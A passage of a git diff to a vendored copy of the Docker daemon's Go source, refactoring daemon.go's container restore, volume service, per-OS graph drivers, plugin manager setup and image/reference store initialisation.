+			return fmt.Errorf("process isolation is invalid for Linux containers on Windows")
+		}
+		hostConfig.Isolation = "hyperv"
+	}
+	parser := volumemounts.NewParser(container.OS)
 	for spec := range config.Volumes {
 
-		mp, err := volume.ParseMountRaw(spec, hostConfig.VolumeDriver)
+		mp, err := parser.ParseMountRaw(spec, hostConfig.VolumeDriver)
 		if err != nil {
 			return fmt.Errorf("Unrecognised volume spec: %v", err)
 		}
@@ -38,7 +51,7 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain
 
 		// Create the volume in the volume driver. If it doesn't exist,
 		// a new one will be created.
-		v, err := daemon.volumes.CreateWithRef(mp.Name, volumeDriver, container.ID, nil, nil)
+		v, err := daemon.volumes.Create(context.TODO(), mp.Name, volumeDriver, volumeopts.WithCreateReference(container.ID))
 		if err != nil {
 			return err
 		}
@@ -74,7 +87,7 @@ func (daemon *Daemon) createContainerPlatformSpecificSettings(container *contain
 		//	}
 
 		// Add it to container.MountPoints
-		container.AddMountPointWithVolume(mp.Destination, v, mp.RW)
+		container.AddMountPointWithVolume(mp.Destination, &volumeWrapper{v: v, s: daemon.volumes}, mp.RW)
 	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/daemon.go b/vendor/github.com/docker/docker/daemon/daemon.go
index 55a66aec92..5e5f586ae0 100644
--- a/vendor/github.com/docker/docker/daemon/daemon.go
+++ b/vendor/github.com/docker/docker/daemon/daemon.go
@@ -3,10 +3,10 @@
 //
 // In implementing the various functions of the daemon, there is often
 // a method-specific struct for configuring the runtime behavior.
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"encoding/json"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net"
@@ -18,111 +18,120 @@ import (
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/docker/docker/api"
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/builder"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/daemon/discovery"
 	"github.com/docker/docker/daemon/events"
 	"github.com/docker/docker/daemon/exec"
-	"github.com/docker/docker/daemon/initlayer"
-	"github.com/docker/docker/dockerversion"
-	"github.com/docker/docker/plugin"
-	"github.com/docker/libnetwork/cluster"
+	"github.com/docker/docker/daemon/images"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/errdefs"
+	"github.com/sirupsen/logrus"
 	// register graph drivers
 	_ "github.com/docker/docker/daemon/graphdriver/register"
+	"github.com/docker/docker/daemon/stats"
 	dmetadata "github.com/docker/docker/distribution/metadata"
-	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/libcontainerd"
 	"github.com/docker/docker/migrate/v1"
-	"github.com/docker/docker/pkg/fileutils"
 	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/locker"
 	"github.com/docker/docker/pkg/plugingetter"
-	"github.com/docker/docker/pkg/registrar"
-	"github.com/docker/docker/pkg/signal"
 	"github.com/docker/docker/pkg/sysinfo"
 	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/pkg/truncindex"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/plugin"
+	pluginexec "github.com/docker/docker/plugin/executor/containerd"
+	refstore "github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
 	"github.com/docker/docker/runconfig"
-	volumedrivers "github.com/docker/docker/volume/drivers"
-	"github.com/docker/docker/volume/local"
-	"github.com/docker/docker/volume/store"
+	volumesservice "github.com/docker/docker/volume/service"
 	"github.com/docker/libnetwork"
+	"github.com/docker/libnetwork/cluster"
 	nwconfig "github.com/docker/libnetwork/config"
-	"github.com/docker/libtrust"
 	"github.com/pkg/errors"
 )
 
-var (
-	// DefaultRuntimeBinary is the default runtime to be used by
-	// containerd if none is specified
-	DefaultRuntimeBinary = "docker-runc"
-
-	// DefaultInitBinary is the name of the default init binary
-	DefaultInitBinary = "docker-init"
+// ContainersNamespace is the name of the namespace used for users containers
+const ContainersNamespace = "moby"
 
-	errSystemNotSupported = fmt.Errorf("The Docker daemon is not supported on this platform.")
+var (
+	errSystemNotSupported = errors.New("the Docker daemon is not supported on this platform")
 )
 
 // Daemon holds information about the Docker daemon.
 type Daemon struct {
-	ID                        string
-	repository                string
-	containers                container.Store
-	execCommands              *exec.Store
-	referenceStore            reference.Store
-	downloadManager           *xfer.LayerDownloadManager
-	uploadManager             *xfer.LayerUploadManager
-	distributionMetadataStore dmetadata.Store
-	trustKey                  libtrust.PrivateKey
-	idIndex                   *truncindex.TruncIndex
-	configStore               *Config
-	statsCollector            *statsCollector
-	defaultLogConfig          containertypes.LogConfig
-	RegistryService           registry.Service
-	EventsService             *events.Events
-	netController             libnetwork.NetworkController
-	volumes                   *store.VolumeStore
-	discoveryWatcher          discoveryReloader
-	root                      string
-	seccompEnabled            bool
-	shutdown                  bool
-	uidMaps                   []idtools.IDMap
-	gidMaps                   []idtools.IDMap
-	layerStore                layer.Store
-	imageStore                image.Store
-	PluginStore               *plugin.Store // todo: remove
-	pluginManager             *plugin.Manager
-	nameIndex                 *registrar.Registrar
-	linkIndex                 *linkIndex
-	containerd                libcontainerd.Client
-	containerdRemote          libcontainerd.Remote
-	defaultIsolation          containertypes.Isolation // Default isolation mode on Windows
-	clusterProvider           cluster.Provider
-	cluster                   Cluster
+	ID                string
+	repository        string
+	containers        container.Store
+	containersReplica container.ViewDB
+	execCommands      *exec.Store
+	imageService      *images.ImageService
+	idIndex           *truncindex.TruncIndex
+	configStore       *config.Config
+	statsCollector    *stats.Collector
+	defaultLogConfig  containertypes.LogConfig
+	RegistryService   registry.Service
+	EventsService     *events.Events
+	netController     libnetwork.NetworkController
+	volumes           *volumesservice.VolumesService
+	discoveryWatcher  discovery.Reloader
+	root              string
+	seccompEnabled    bool
+	apparmorEnabled   bool
+	shutdown          bool
+	idMappings        *idtools.IDMappings
+	// TODO: move graphDrivers field to an InfoService
+	graphDrivers map[string]string // By operating system
+
+	PluginStore           *plugin.Store // todo: remove
+	pluginManager         *plugin.Manager
+	linkIndex             *linkIndex
+	containerd            libcontainerd.Client
+	defaultIsolation      containertypes.Isolation // Default isolation mode on Windows
+	clusterProvider       cluster.Provider
+	cluster               Cluster
+	genericResources      []swarm.GenericResource
+	metricsPluginListener net.Listener
+
+	machineMemory uint64
 
 	seccompProfile     []byte
 	seccompProfilePath string
+
+	diskUsageRunning int32
+	pruneRunning     int32
+	hosts            map[string]bool // hosts stores the addresses the daemon is listening on
+	startupDone      chan struct{}
+
+	attachmentStore       network.AttachmentStore
+	attachableNetworkLock *locker.Locker
+}
+
+// StoreHosts stores the addresses the daemon is listening on
+func (daemon *Daemon) StoreHosts(hosts []string) {
+	if daemon.hosts == nil {
+		daemon.hosts = make(map[string]bool)
+	}
+	for _, h := range hosts {
+		daemon.hosts[h] = true
+	}
 }
 
 // HasExperimental returns whether the experimental features of the daemon are enabled or not
 func (daemon *Daemon) HasExperimental() bool {
-	if daemon.configStore != nil && daemon.configStore.Experimental {
-		return true
-	}
-	return false
+	return daemon.configStore != nil && daemon.configStore.Experimental
 }
 
 func (daemon *Daemon) restore() error {
-	var (
-		currentDriver = daemon.GraphDriverName()
-		containers    = make(map[string]*container.Container)
-	)
+	containers := make(map[string]*container.Container)
 
 	logrus.Info("Loading containers: start.")
 
@@ -138,16 +147,20 @@ func (daemon *Daemon) restore() error {
 			logrus.Errorf("Failed to load container %v: %v", id, err)
 			continue
 		}
-
+		if !system.IsOSSupported(container.OS) {
+			logrus.Errorf("Failed to load container %v: %s (%q)", id, system.ErrNotSupportedOperatingSystem, container.OS)
+			continue
+		}
 		// Ignore the container if it does not support the current driver being used by the graph
-		if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver {
-			rwlayer, err := daemon.layerStore.GetRWLayer(container.ID)
+		currentDriverForContainerOS := daemon.graphDrivers[container.OS]
+		if (container.Driver == "" && currentDriverForContainerOS == "aufs") || container.Driver == currentDriverForContainerOS {
+			rwlayer, err := daemon.imageService.GetLayerByID(container.ID, container.OS)
 			if err != nil {
 				logrus.Errorf("Failed to load container mount %v: %v", id, err)
 				continue
 			}
 			container.RWLayer = rwlayer
-			logrus.Debugf("Loaded container %v", container.ID)
+			logrus.Debugf("Loaded container %v, isRunning: %v", container.ID, container.IsRunning())
 
 			containers[container.ID] = container
 		} else {
@@ -160,7 +173,7 @@ func (daemon *Daemon) restore() error {
 	activeSandboxes := make(map[string]interface{})
 	for id, c := range containers {
 		if err := daemon.registerName(c); err != nil {
-			logrus.Errorf("Failed to register container %s: %s", c.ID, err)
+			logrus.Errorf("Failed to register container name %s: %s", c.ID, err)
 			delete(containers, id)
 			continue
 		}
@@ -170,12 +183,6 @@ func (daemon *Daemon) restore() error {
 			continue
 		}
 
-		// verify that all volumes valid and have been migrated from the pre-1.7 layout
-		if err := daemon.verifyVolumesInfo(c); err != nil {
-			// don't skip the container due to error
-			logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err)
-		}
-
 		// The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver.
 		// We should rewrite it to use the daemon defaults.
 		// Fixes https://github.com/docker/docker/issues/22536
@@ -187,22 +194,93 @@ func (daemon *Daemon) restore() error {
 		}
 	}
 
-	var migrateLegacyLinks bool // Not relevant on Windows
-	var wg sync.WaitGroup
-	var mapLock sync.Mutex
+	var (
+		wg      sync.WaitGroup
+		mapLock sync.Mutex
+	)
 	for _, c := range containers {
 		wg.Add(1)
 		go func(c *container.Container) {
 			defer wg.Done()
-			if err := backportMountSpec(c); err != nil {
-				logrus.Error("Failed to migrate old mounts to use new spec format")
+			daemon.backportMountSpec(c)
+			if err := daemon.checkpointAndSave(c); err != nil {
+				logrus.WithError(err).WithField("container", c.ID).Error("error saving backported mountspec to disk")
+			}
+
+			daemon.setStateCounter(c)
+
+			logrus.WithFields(logrus.Fields{
+				"container": c.ID,
+				"running":   c.IsRunning(),
+				"paused":    c.IsPaused(),
+			}).Debug("restoring container")
+
+			var (
+				err      error
+				alive    bool
+				ec       uint32
+				exitedAt time.Time
+			)
+
+			alive, _, err = daemon.containerd.Restore(context.Background(), c.ID, c.InitializeStdio)
+			if err != nil && !errdefs.IsNotFound(err) {
+				logrus.Errorf("Failed to restore container %s with containerd: %s", c.ID, err)
+				return
+			}
+			if !alive {
+				ec, exitedAt, err = daemon.containerd.DeleteTask(context.Background(), c.ID)
+				if err != nil && !errdefs.IsNotFound(err) {
+					logrus.WithError(err).Errorf("Failed to delete container %s from containerd", c.ID)
+					return
+				}
+			} else if !daemon.configStore.LiveRestoreEnabled {
+				if err := daemon.kill(c, c.StopSignal()); err != nil && !errdefs.IsNotFound(err) {
+					logrus.WithError(err).WithField("container", c.ID).Error("error shutting down container")
+					return
+				}
 			}
 
 			if c.IsRunning() || c.IsPaused() {
 				c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking
-				if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil {
-					logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err)
-					return
+
+				if c.IsPaused() && alive {
+					s, err := daemon.containerd.Status(context.Background(), c.ID)
+					if err != nil {
+						logrus.WithError(err).WithField("container", c.ID).
+							Errorf("Failed to get container status")
+					} else {
+						logrus.WithField("container", c.ID).WithField("state", s).
+							Info("restored container paused")
+						switch s {
+						case libcontainerd.StatusPaused, libcontainerd.StatusPausing:
+							// nothing to do
+						case libcontainerd.StatusStopped:
+							alive = false
+						case libcontainerd.StatusUnknown:
+							logrus.WithField("container", c.ID).
+								Error("Unknown status for container during restore")
+						default:
+							// running
+							c.Lock()
+							c.Paused = false
+							daemon.setStateCounter(c)
+							if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+								logrus.WithError(err).WithField("container", c.ID).
+									Error("Failed to update stopped container state")
+							}
+							c.Unlock()
+						}
+					}
+				}
+
+				if !alive {
+					c.Lock()
+					c.SetStopped(&container.ExitStatus{ExitCode: int(ec), ExitedAt: exitedAt})
+					daemon.Cleanup(c)
+					if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+						logrus.Errorf("Failed to update stopped container %s state: %v", c.ID, err)
+					}
+					c.Unlock()
 				}
 
 				// we call Mount and then Unmount to get BaseFs of the container
@@ -215,7 +293,6 @@ func (daemon *Daemon) restore() error {
 					// The error is only logged here.
 					logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err)
 				} else {
-					// if mount success, then unmount it
 					if err := daemon.Unmount(c); err != nil {
 						logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err)
 					}
@@ -231,28 +308,27 @@ func (daemon *Daemon) restore() error {
 					activeSandboxes[c.NetworkSettings.SandboxID] = options
 					mapLock.Unlock()
 				}
-
 			}
-			// fixme: only if not running
+
 			// get list of containers we need to restart
-			if !c.IsRunning() && !c.IsPaused() {
-				// Do not autostart containers which
-				// has endpoints in a swarm scope
-				// network yet since the cluster is
-				// not initialized yet. We will start
-				// it after the cluster is
-				// initialized.
-				if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint {
-					mapLock.Lock()
-					restartContainers[c] = make(chan struct{})
-					mapLock.Unlock()
-				} else if c.HostConfig != nil && c.HostConfig.AutoRemove {
-					mapLock.Lock()
-					removeContainers[c.ID] = c
-					mapLock.Unlock()
-				}
+
+			// Do not autostart containers which
+			// has endpoints in a swarm scope
+			// network yet since the cluster is
+			// not initialized yet. We will start
+			// it after the cluster is
+			// initialized.
+			if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint && c.HasBeenStartedBefore {
+				mapLock.Lock()
+				restartContainers[c] = make(chan struct{})
+				mapLock.Unlock()
+			} else if c.HostConfig != nil && c.HostConfig.AutoRemove {
+				mapLock.Lock()
+				removeContainers[c.ID] = c
+				mapLock.Unlock()
 			}
 
+			c.Lock()
 			if c.RemovalInProgress {
 				// We probably crashed in the middle of a removal, reset
 				// the flag.
@@ -263,15 +339,13 @@ func (daemon *Daemon) restore() error {
 				// be removed. So we put the container in the "dead"
 				// state and leave further processing up to them.
 				logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID)
-				c.ResetRemovalInProgress()
-				c.SetDead()
-				c.ToDisk()
-			}
-
-			// if c.hostConfig.Links is nil (not just empty), then it is using the old sqlite links and needs to be migrated
-			if c.HostConfig != nil && c.HostConfig.Links == nil {
-				migrateLegacyLinks = true
+				c.RemovalInProgress = false
+				c.Dead = true
+				if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+					logrus.Errorf("Failed to update RemovalInProgress container %s state: %v", c.ID, err)
+				}
 			}
+			c.Unlock()
 		}(c)
 	}
 	wg.Wait()
@@ -280,13 +354,6 @@ func (daemon *Daemon) restore() error {
 		return fmt.Errorf("Error initializing network controller: %v", err)
 	}
 
-	// Perform migration of legacy sqlite links (no-op on Windows)
-	if migrateLegacyLinks {
-		if err := daemon.sqliteMigration(containers); err != nil {
-			return err
-		}
-	}
-
 	// Now that all the containers are registered, register the links
 	for _, c := range containers {
 		if err := daemon.registerLinks(c, c.HostConfig); err != nil {
@@ -348,7 +415,7 @@ func (daemon *Daemon) restore() error {
 		// if the container has restart policy, do not
 		// prepare the mountpoints since it has been done on restarting.
 		// This is to speed up the daemon start when a restart container
-		// has a volume and the volume dirver is not available.
+		// has a volume and the volume driver is not available.
 		if _, ok := restartContainers[c]; ok {
 			continue
 		} else if _, ok := removeContainers[c.ID]; ok {
@@ -381,7 +448,7 @@ func (daemon *Daemon) RestartSwarmContainers() {
 			// Autostart all the containers which has a
 			// swarm endpoint now that the cluster is
 			// initialized.
-			if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint {
+			if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint && c.HasBeenStartedBefore {
 				group.Add(1)
 				go func(c *container.Container) {
 					defer group.Done()
@@ -435,8 +502,8 @@ func (daemon *Daemon) parents(c *container.Container) map[string]*container.Cont
 
 func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error {
 	fullName := path.Join(parent.Name, alias)
-	if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil {
-		if err == registrar.ErrNameReserved {
+	if err := daemon.containersReplica.ReserveName(fullName, child.ID); err != nil {
+		if err == container.ErrNameReserved {
 			logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err)
 			return nil
 		}
@@ -457,15 +524,34 @@ func (daemon *Daemon) DaemonLeavesCluster() {
 	// Daemon is in charge of removing the attachable networks with
 	// connected containers when the node leaves the swarm
 	daemon.clearAttachableNetworks()
+	// We no longer need the cluster provider, stop it now so that
+	// the network agent will stop listening to cluster events.
 	daemon.setClusterProvider(nil)
+	// Wait for the networking cluster agent to stop
+	daemon.netController.AgentStopWait()
+	// Daemon is in charge of removing the ingress network when the
+	// node leaves the swarm. Wait for job to be done or timeout.
+	// This is called also on graceful daemon shutdown. We need to
+	// wait, because the ingress release has to happen before the
+	// network controller is stopped.
+	if done, err := daemon.ReleaseIngress(); err == nil {
+		select {
+		case <-done:
+		case <-time.After(5 * time.Second):
+			logrus.Warnf("timeout while waiting for ingress network removal")
+		}
+	} else {
+		logrus.Warnf("failed to initiate ingress network removal: %v", err)
+	}
+
+	daemon.attachmentStore.ClearAttachments()
 }
 
 // setClusterProvider sets a component for querying the current cluster state.
 func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) {
 	daemon.clusterProvider = clusterProvider
-	// call this in a goroutine to allow netcontroller handle this event async
-	// and not block if it is in the middle of talking with cluster
-	go daemon.netController.SetClusterProvider(clusterProvider)
+	daemon.netController.SetClusterProvider(clusterProvider)
+	daemon.attachableNetworkLock = locker.New()
 }
 
 // IsSwarmCompatible verifies if the current daemon
@@ -474,12 +560,12 @@ func (daemon *Daemon) IsSwarmCompatible() error {
 	if daemon.configStore == nil {
 		return nil
 	}
-	return daemon.configStore.isSwarmCompatible()
+	return daemon.configStore.IsSwarmCompatible()
 }
 
 // NewDaemon sets up everything for the daemon to be able to service
 // requests from the webserver.
-func NewDaemon(config *Config, registryService registry.Service, containerdRemote libcontainerd.Remote) (daemon *Daemon, err error) {
+func NewDaemon(config *config.Config, registryService registry.Service, containerdRemote libcontainerd.Remote, pluginStore *plugin.Store) (daemon *Daemon, err error) {
 	setDefaultMtu(config)
 
 	// Ensure that we have a correct root key limit for launching containers.
@@ -505,31 +591,41 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot
 		return nil, err
 	}
 
-	uidMaps, gidMaps, err := setupRemappedRoot(config)
-	if err != nil {
-		return nil, err
-	}
-	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	idMappings, err := setupRemappedRoot(config)
 	if err != nil {
 		return nil, err
 	}
-
+	rootIDs := idMappings.RootPair()
 	if err := setupDaemonProcess(config); err != nil {
 		return nil, err
 	}
 
 	// set up the tmpDir to use a canonical path
-	tmp, err := tempDir(config.Root, rootUID, rootGID)
+	tmp, err := prepareTempDir(config.Root, rootIDs)
 	if err != nil {
 		return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err)
 	}
-	realTmp, err := fileutils.ReadSymlinkedDirectory(tmp)
+	realTmp, err := getRealPath(tmp)
 	if err != nil {
 		return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err)
 	}
-	os.Setenv("TMPDIR", realTmp)
+	if runtime.GOOS == "windows" {
+		if _, err := os.Stat(realTmp); err != nil && os.IsNotExist(err) {
+			if err := system.MkdirAll(realTmp, 0700, ""); err != nil {
+				return nil, fmt.Errorf("Unable to create the TempDir (%s): %s", realTmp, err)
+			}
+		}
+		os.Setenv("TEMP", realTmp)
+		os.Setenv("TMP", realTmp)
+	} else {
+		os.Setenv("TMPDIR", realTmp)
+	}
 
-	d := &Daemon{configStore: config}
+	d := &Daemon{
+		configStore: config,
+		PluginStore: pluginStore,
+		startupDone: make(chan struct{}),
+	}
 	// Ensure the daemon is properly shutdown if there is a failure during
 	// initialization
 	defer func() {
@@ -540,6 +636,17 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot
 		}
 	}()
 
+	if err := d.setGenericResources(config); err != nil {
+		return nil, err
+	}
+	// set up SIGUSR1 handler on Unix-like systems, or a Win32 global event
+	// on Windows to dump Go routine stacks
+	stackDumpDir := config.Root
+	if execRoot := config.GetExecRoot(); execRoot != "" {
+		stackDumpDir = execRoot
+	}
+	d.setupDumpStackTrap(stackDumpDir)
+
 	if err := d.setupSeccompProfile(); err != nil {
 		return nil, err
 	}
@@ -549,8 +656,6 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot
 		return nil, fmt.Errorf("error setting default isolation mode: %v", err)
 	}
 
-	logrus.Debugf("Using default logging driver %s", config.LogConfig.Type)
-
 	if err := configureMaxThreads(config); err != nil {
 		logrus.Warnf("Failed to configure golang's threads limit: %v", err)
 	}
@@ -560,111 +665,171 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot
 	}
 
 	daemonRepo := filepath.Join(config.Root, "containers")
-	if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
+	if err := idtools.MkdirAllAndChown(daemonRepo, 0700, rootIDs); err != nil {
+		return nil, err
+	}
+
+	// Create the directory where we'll store the runtime scripts (i.e. in
+	// order to support runtimeArgs)
+	daemonRuntimes := filepath.Join(config.Root, "runtimes")
+	if err := system.MkdirAll(daemonRuntimes, 0700, ""); err != nil {
+		return nil, err
+	}
+	if err := d.loadRuntimes(); err != nil {
 		return nil, err
 	}
 
 	if runtime.GOOS == "windows" {
-		if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) {
+		if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0, ""); err != nil {
 			return nil, err
 		}
 	}
 
-	driverName := os.Getenv("DOCKER_DRIVER")
-	if driverName == "" {
-		driverName = config.GraphDriver
+	// On Windows we don't support the environment variable, or a user supplied graphdriver
+	// as Windows has no choice in terms of which graphdrivers to use. It's a case of
+	// running Windows containers on Windows - windowsfilter, running Linux containers on Windows,
+	// lcow. Unix platforms however run a single graphdriver for all containers, and it can
+	// be set through an environment variable, a daemon start parameter, or chosen through
+	// initialization of the layerstore through driver priority order for example.
+	d.graphDrivers = make(map[string]string)
+	layerStores := make(map[string]layer.Store)
+	if runtime.GOOS == "windows" {
+		d.graphDrivers[runtime.GOOS] = "windowsfilter"
+		if system.LCOWSupported() {
+			d.graphDrivers["linux"] = "lcow"
+		}
+	} else {
+		driverName := os.Getenv("DOCKER_DRIVER")
+		if driverName == "" {
+			driverName = config.GraphDriver
+		} else {
+			logrus.Infof("Setting the storage driver from the $DOCKER_DRIVER environment variable (%s)", driverName)
+		}
+		d.graphDrivers[runtime.GOOS] = driverName // May still be empty. Layerstore init determines instead.
 	}
 
 	d.RegistryService = registryService
-	d.PluginStore = plugin.NewStore(config.Root) // todo: remove
+	logger.RegisterPluginGetter(d.PluginStore)
+
+	metricsSockPath, err := d.listenMetricsSock()
+	if err != nil {
+		return nil, err
+	}
+	registerMetricsPluginCallback(d.PluginStore, metricsSockPath)
+
+	createPluginExec := func(m *plugin.Manager) (plugin.Executor, error) {
+		return pluginexec.New(getPluginExecRoot(config.Root), containerdRemote, m)
+	}
+
 	// Plugin system initialization should happen before restore. Do not change order.
 	d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{
 		Root:               filepath.Join(config.Root, "plugins"),
-		ExecRoot:           "/run/docker/plugins", // possibly needs fixing
+		ExecRoot:           getPluginExecRoot(config.Root),
 		Store:              d.PluginStore,
-		Executor:           containerdRemote,
+		CreateExecutor:     createPluginExec,
 		RegistryService:    registryService,
 		LiveRestoreEnabled: config.LiveRestoreEnabled,
 		LogPluginEvent:     d.LogPluginEvent, // todo: make private
+		AuthzMiddleware:    config.AuthzMiddleware,
 	})
 	if err != nil {
 		return nil, errors.Wrap(err, "couldn't create plugin manager")
 	}
 
-	d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{
-		StorePath:                 config.Root,
-		MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"),
-		GraphDriver:               driverName,
-		GraphDriverOptions:        config.GraphOptions,
-		UIDMaps:                   uidMaps,
-		GIDMaps:                   gidMaps,
-		PluginGetter:              d.PluginStore,
-		ExperimentalEnabled:       config.Experimental,
-	})
-	if err != nil {
+	if err := d.setupDefaultLogConfig(); err != nil {
 		return nil, err
 	}
 
-	graphDriver := d.layerStore.DriverName()
-	imageRoot := filepath.Join(config.Root, "image", graphDriver)
+	for operatingSystem, gd := range d.graphDrivers {
+		layerStores[operatingSystem], err = layer.NewStoreFromOptions(layer.StoreOptions{
+			Root: config.Root,
+			MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"),
+			GraphDriver:               gd,
+			GraphDriverOptions:        config.GraphOptions,
+			IDMappings:                idMappings,
+			PluginGetter:              d.PluginStore,
+			ExperimentalEnabled:       config.Experimental,
+			OS:                        operatingSystem,
+		})
+		if err != nil {
+			return nil, err
+		}
+	}
 
-	// Configure and validate the kernels security support
-	if err := configureKernelSecuritySupport(config, graphDriver); err != nil {
-		return nil, err
+	// As layerstore initialization may set the driver
+	for os := range d.graphDrivers {
+		d.graphDrivers[os] = layerStores[os].DriverName()
 	}
 
-	logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads)
-	d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads)
-	logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads)
-	d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads)
+	// Configure and validate the kernels security support. Note this is a Linux/FreeBSD
+	// operation only, so it is safe to pass *just* the runtime OS graphdriver.
+	if err := configureKernelSecuritySupport(config, d.graphDrivers[runtime.GOOS]); err != nil {
+		return nil, err
+	}
 
+	imageRoot := filepath.Join(config.Root, "image", d.graphDrivers[runtime.GOOS])
 	ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb"))
 	if err != nil {
 		return nil, err
 	}
 
-	d.imageStore, err = image.NewImageStore(ifs, d.layerStore)
+	lgrMap := make(map[string]image.LayerGetReleaser)
+	for os, ls := range layerStores {
+		lgrMap[os] = ls
+	}
+	imageStore, err := image.NewImageStore(ifs, lgrMap)
 	if err != nil {
 		return nil, err
 	}
 
-	// Configure the volumes driver
-	volStore, err := d.configureVolumes(rootUID, rootGID)
+	d.volumes, err = volumesservice.NewVolumeService(config.Root, d.PluginStore, rootIDs, d)
 	if err != nil {
 		return nil, err
 	}
 
-	trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath)
+	trustKey, err := loadOrCreateTrustKey(config.TrustKeyPath)
 	if err != nil {
 		return nil, err
 	}
 
 	trustDir := filepath.Join(config.Root, "trust")
 
-	if err := system.MkdirAll(trustDir, 0700); err != nil {
+	if err := system.MkdirAll(trustDir, 0700, ""); err != nil {
 		return nil, err
 	}
 
-	distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution"))
+	// We have a single tag/reference store for the daemon globally. However, it's
+	// stored under the graphdriver. On host platforms which only support a single
+	// container OS, but multiple selectable graphdrivers, this means depending on which
+	// graphdriver is chosen, the global reference store is under there. For
+	// platforms which support multiple container operating systems, this is slightly
+	// more problematic as where does the global ref store get located? Fortunately,
+	// for Windows, which is currently the only daemon supporting multiple container
+	// operating systems, the list of graphdrivers available isn't user configurable.
+	// For backwards compatibility, we just put it under the windowsfilter
+	// directory regardless.
+	refStoreLocation := filepath.Join(imageRoot, `repositories.json`)
+	rs, err := refstore.NewReferenceStore(refStoreLocation)
 	if err != nil {
-		return nil, err
+		return nil, fmt.Errorf("Couldn't create reference store repository: %s", err)
 	}
 
-	eventsService := events.New()
-
-	referenceStore, err := reference.NewReferenceStore(filepath.Join(imageRoot, "repositories.json"))
+	distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution"))
 	if err != nil {
-		return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err)
+		return nil, err
 	}
 
-	migrationStart := time.Now()
-	if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil {
-		logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err)
+	// No content-addressability migration on Windows as it never supported pre-CA
+	if runtime.GOOS != "windows" {
+		migrationStart := time.Now()
+		if err := v1.Migrate(config.Root, d.graphDrivers[runtime.GOOS], layerStores[runtime.GOOS], imageStore, rs, distributionMetadataStore); err != nil {
+			logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err)
+		}
+		logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds())
 	}
-	logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds())
 
 	// Discovery is only enabled when the daemon is launched with an address to advertise.  When
-	// initialized, the daemon is registered and we can store the discovery backend as its read-only
